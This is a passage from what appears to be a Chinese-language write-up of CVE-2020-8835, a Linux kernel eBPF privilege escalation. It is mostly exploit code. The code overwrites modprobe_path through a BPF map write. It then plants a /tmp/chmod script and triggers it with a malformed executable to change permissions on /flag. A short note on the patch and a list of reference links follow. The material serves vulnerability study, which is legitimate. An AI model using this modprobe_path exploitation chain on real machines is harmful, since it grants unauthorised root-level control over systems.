bpf_map_update_elem(exp_mapfd,0,exp_buf,modprobe_path);
exp_buf64[0] = 0x6d68632f -1;
bpf_map_update_elem(exp_mapfd,0,exp_buf,modprobe_path+4);
exp_buf64[0] = 0x646f -1;
bpf_map_update_elem(exp_mapfd,0,exp_buf,modprobe_path+8);

//sleep(10);
// NOTE(review): ">>" appends, so running the program again adds duplicate
// lines to /tmp/chmod
system("echo '#!/bin/sh' >> /tmp/chmod");
system("echo 'chmod 777 /flag' >> /tmp/chmod");
system("chmod +x /tmp/chmod");
system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake");
system("chmod +x /tmp/fake");
system("/tmp/fake");
system("cat /flag");

}

运行结果:

image-20221122230355242

修复:

更新的版本中,该函数直接被patch掉了,算是代码写错了(?)

参考资料

https://man7.org/linux/man-pages/man2/bpf.2.html

https://new.qq.com/rain/a/20200425A0KSAK00

https://a1ex.online/2021/05/01/CVE-2020-8835-eBPF%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification

https://www.anquanke.com/post/id/203416#h3-4